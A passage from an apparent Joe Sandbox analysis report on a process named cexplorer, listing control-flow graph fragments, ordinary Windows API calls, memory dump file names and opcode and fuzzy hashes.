                                                                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,0356C843,?,00000000,?,00000000,0356C860), ref: 0356C7DE
                                                                                                            • VerQueryValueW.VERSION(?,0356C874,?,?,00000000,?,00000000,?,00000000,0356C843,?,00000000,?,00000000,0356C860), ref: 0356C7F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2179348866-0
                                                                                                            • Opcode ID: 437785bb5c6bbf92fc6a83fb5ec951b4340752eeebdc4a66d3de5735be9c941e
                                                                                                            • Instruction ID: a3ad4d1d74582f5e63e9d5326e499918992226929ff82190be2b8638d9f284f6
                                                                                                            • Opcode Fuzzy Hash: 437785bb5c6bbf92fc6a83fb5ec951b4340752eeebdc4a66d3de5735be9c941e
                                                                                                            • Instruction Fuzzy Hash: 18313E75A04309AFDB10DFA9E8519AEB7F8FB89700B5144B6F854E7221D774EE00C760

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 219 35e988c-35e9898 220 35e989a-35e98b0 CallNextHookEx 219->220 221 35e98b2-35e98bb 219->221 222 35e98fb-35e9900 220->222 223 35e98dc-35e98f8 CallNextHookEx 221->223 224 35e98bd-35e98d7 PostMessageW 221->224 223->222 224->223
                                                                                                            APIs
                                                                                                            • CallNextHookEx.USER32(00000000,?,?,?), ref: 035E98A8
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 035E98D7
                                                                                                            • CallNextHookEx.USER32(?,?,?,?), ref: 035E98F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallHookNext$MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 1364302874-0
                                                                                                            • Opcode ID: 959618a9d7fb61353fdeb38d24f1223648848ff90e654829cffbaa18a8259424
                                                                                                            • Instruction ID: 02bdbe0e6f14d646bc67045bd5b3a4975ae1f7de986b387e8a53e88608e17ef7
                                                                                                            • Opcode Fuzzy Hash: 959618a9d7fb61353fdeb38d24f1223648848ff90e654829cffbaa18a8259424
                                                                                                            • Instruction Fuzzy Hash: 0D114CBA604209EFDB44DF9CE880E9A77ECFB4D350B008545FA19DB364C334EA419B60

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0355A81F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0355A8A6,00000000,?,00000105), ref: 0355A7B3
                                                                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0355A81F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0355A8A6,00000000,?,00000105), ref: 0355A7DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DefaultLanguage$SystemUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 384301227-0
                                                                                                            • Opcode ID: 45fb8208c9d3cf83f39e7537d975faa30d8142347b30bad2ecd2264c275287a2
                                                                                                            • Instruction ID: 2b98cfe7853ac3e01b61093c1d763e866e15d8de71693582cbd43f13fb657c28
                                                                                                            • Opcode Fuzzy Hash: 45fb8208c9d3cf83f39e7537d975faa30d8142347b30bad2ecd2264c275287a2
                                                                                                            • Instruction Fuzzy Hash: 38310074A1020A9FDB12EB98E8A1AADB7B5FB88700F544667F800A7270D774BD45CB51

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A868
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A8B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileLibraryLoadModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 1159719554-0
                                                                                                            • Opcode ID: 35e4b958879036075fe5f012c2cffdc2a0cdac3697ad2100c5dea7fa855175dc
                                                                                                            • Instruction ID: c2fcf294f90898449bf265e06d2368173b557ef6812851ea01da7fa1bf05b8bc
                                                                                                            • Opcode Fuzzy Hash: 35e4b958879036075fe5f012c2cffdc2a0cdac3697ad2100c5dea7fa855175dc
                                                                                                            • Instruction Fuzzy Hash: C9114F34A4431D9BDB15EB54E8A5BDDB3B8FB48300F5141B6B908AB2A1DA706F84CE64

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 315 3554ea8-3554eb9 316 3554ecd-3554ecf 315->316 317 3554ed1-3554ed6 316->317 318 3554ebb-3554ecb VirtualFree 316->318 319 3554edb-3554ef5 317->319 318->316 319->319 320 3554ef7-3554f01 319->320 321 3554f06-3554f11 320->321 321->321 322 3554f13-3554f35 call 35553bc 321->322 325 3554f49-3554f4b 322->325 326 3554f37-3554f47 VirtualFree 325->326 327 3554f4d-3554f56 325->327 326->325
                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(035F4A5C,00000000,00008000), ref: 03554EC6
                                                                                                            • VirtualFree.KERNEL32(035F6B00,00000000,00008000), ref: 03554F42
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 85d265cb1c9bc1ae4947369478cf1b000f2f4e11f898492c06985d83243b633f
                                                                                                            • Instruction ID: 02db558ece5aef5c67616e59e227d9d055bf5d53c7aaa5759ac1bcd9228c3f6b
                                                                                                            • Opcode Fuzzy Hash: 85d265cb1c9bc1ae4947369478cf1b000f2f4e11f898492c06985d83243b633f
                                                                                                            • Instruction Fuzzy Hash: 8211BFB17006009FD764CF5AB855B26BAE5FB88710F1589AEFA4DDF360D730E8418B98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 328 355c400-355c448 call 3555278 CreateWindowExW call 3555268 332 355c44d-355c454 328->332
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(000000A0,00000000,?,00000000,00000000,035E6FA7,?,00000000,035E7016,?,?,?), ref: 0355C43F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 993b40372ded986758e10d910bcff418d912927c9da50b718accd923f3091136
                                                                                                            • Instruction ID: 77ab7ab277c03c1d909bb8974a4a6c9116e590031e0f6d3198c4cc129646b1ba
                                                                                                            • Opcode Fuzzy Hash: 993b40372ded986758e10d910bcff418d912927c9da50b718accd923f3091136
                                                                                                            • Instruction Fuzzy Hash: D1F097B6604219BF8B44DE9DDC80DDF77ECEB8D2A0B054525FA0CE7210D634ED1087A0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 333 35595b4-35595c2 334 35595c4-35595db GetModuleFileNameW call 355a82c 333->334 335 35595ef-35595fa 333->335 337 35595e0-35595e7 334->337 337->335 338 35595e9-35595ec 337->338 338->335
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 035595D2
                                                                                                              • Part of subcall function 0355A82C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A868
                                                                                                              • Part of subcall function 0355A82C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0355A8E6,?,?,00000000), ref: 0355A8B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 4113206344-0
                                                                                                            • Opcode ID: 3fa9d78bf1d1d9bcf32d207f293726de594c7b481e3e9540a8b4e3ecdafb39e2
                                                                                                            • Instruction ID: 9d89ae8f1253d37648fc122c1160223827aef076cf05e4c19bbdab2e9b01aa5b
                                                                                                            • Opcode Fuzzy Hash: 3fa9d78bf1d1d9bcf32d207f293726de594c7b481e3e9540a8b4e3ecdafb39e2
                                                                                                            • Instruction Fuzzy Hash: 0BE0EDB5A003109BCB10DFA8D8D4A5677E8BF48754F044A96BD18CF256E775E920C7D1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 339 355b1d8-355b1df 340 355b1e1-355b1ed call 355b1a0 339->340 341 355b1fa 339->341 340->341 344 355b1ef-355b1f5 TlsFree 340->344 344->341
                                                                                                            APIs
                                                                                                              • Part of subcall function 0355B1A0: TlsGetValue.KERNEL32(0000002D), ref: 0355B1B8
                                                                                                              • Part of subcall function 0355B1A0: LocalFree.KERNEL32(00000000,0000002D), ref: 0355B1C2
                                                                                                              • Part of subcall function 0355B1A0: TlsSetValue.KERNEL32(0000002D,00000000,00000000,0000002D), ref: 0355B1CF
                                                                                                            • TlsFree.KERNEL32(0000002D), ref: 0355B1F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeValue$Local
                                                                                                            • String ID:
                                                                                                            • API String ID: 2930853931-0
                                                                                                            • Opcode ID: 11a443838712413e84e8968375c045c19d8bb7a7e8feb8971ad745f79d018a5a
                                                                                                            • Instruction ID: d80ff48e3bc7fa1a14590dd590c1e51758c16bc1d46116efbcca01029f899255
                                                                                                            • Opcode Fuzzy Hash: 11a443838712413e84e8968375c045c19d8bb7a7e8feb8971ad745f79d018a5a
                                                                                                            • Instruction Fuzzy Hash: CEC0123C1007418DD660E179E82C6102274BB40321F444252B922C61F0D928A0469B21
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,03553DCF), ref: 035537CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: ab7bd52f04c64cda0bf86f356c249f500864db76f484cd8e870c843431f2ad66
                                                                                                            • Instruction ID: 2f927c1c1427e61513948bdd165ffbb07016a2d0fec14777ae459dd7110e192f
                                                                                                            • Opcode Fuzzy Hash: ab7bd52f04c64cda0bf86f356c249f500864db76f484cd8e870c843431f2ad66
                                                                                                            • Instruction Fuzzy Hash: EBF0DCF2B043014FD714EFB8AA41B02BBE2F744340F00063EED89DB6A8E77088068784
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,03563088,?,?), ref: 03559F55
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 03559F66
                                                                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,03563088,?,?), ref: 0355A066
                                                                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,03563088,?,?), ref: 0355A078
                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,03563088,?,?), ref: 0355A084
                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,03563088,?,?), ref: 0355A0C9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                            • API String ID: 1930782624-3908791685
                                                                                                            • Opcode ID: 57c348ebb66741694d29f5a05ddf9f43e168b69c2b83defd34415662921e6a76
                                                                                                            • Instruction ID: 712b0ab26f0f07e5da5190062a63d0080ab01aa3a118532257713ad8c087956b
                                                                                                            • Opcode Fuzzy Hash: 57c348ebb66741694d29f5a05ddf9f43e168b69c2b83defd34415662921e6a76
                                                                                                            • Instruction Fuzzy Hash: 74419636E0061ADBCB11DA94DC94ADEB3B5BF84310F1885A6AD08E7270E778BE44DB45
                                                                                                            APIs
                                                                                                            • IsValidLocale.KERNEL32(?,00000002,00000000,03559C41,?,03563088,?,00000000), ref: 03559B86
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,03559C41,?,03563088,?,00000000), ref: 03559BA2
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,03559C41,?,03563088,?,00000000), ref: 03559BB3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Locale$Info$Valid
                                                                                                            • String ID:
                                                                                                            • API String ID: 1826331170-0
                                                                                                            • Opcode ID: 5651bd08e9f8d1c1dc5bbc6736eb1172950e0ef2913da4fcda5c6fc199421260
                                                                                                            • Instruction ID: 520236c170a3a245d40d80bfc49f53db85672ba11d9ade6307d0d395648a2153
                                                                                                            • Opcode Fuzzy Hash: 5651bd08e9f8d1c1dc5bbc6736eb1172950e0ef2913da4fcda5c6fc199421260
                                                                                                            • Instruction Fuzzy Hash: 17319335A04708EEEF20DB54ECA0BDEB7B9FB48711F400196B909A7274D7397E80CA11
                                                                                                            APIs
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 03566FF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1705453755-0
                                                                                                            • Opcode ID: d1a421e78e76d8e9275bf7b6749d2d5875c0d122cd6039931ec288c866d8c84f
                                                                                                            • Instruction ID: 292642b0a876aefee4dacdb696a3b1d6af90951553c7dec2a6ddbadae74364ac
                                                                                                            • Opcode Fuzzy Hash: d1a421e78e76d8e9275bf7b6749d2d5875c0d122cd6039931ec288c866d8c84f
                                                                                                            • Instruction Fuzzy Hash: D511D2B5E00209AFDB04CF99DC81DAFF7F9FFC8310B54C559A505EB254E631AA018B90
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0356A91A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
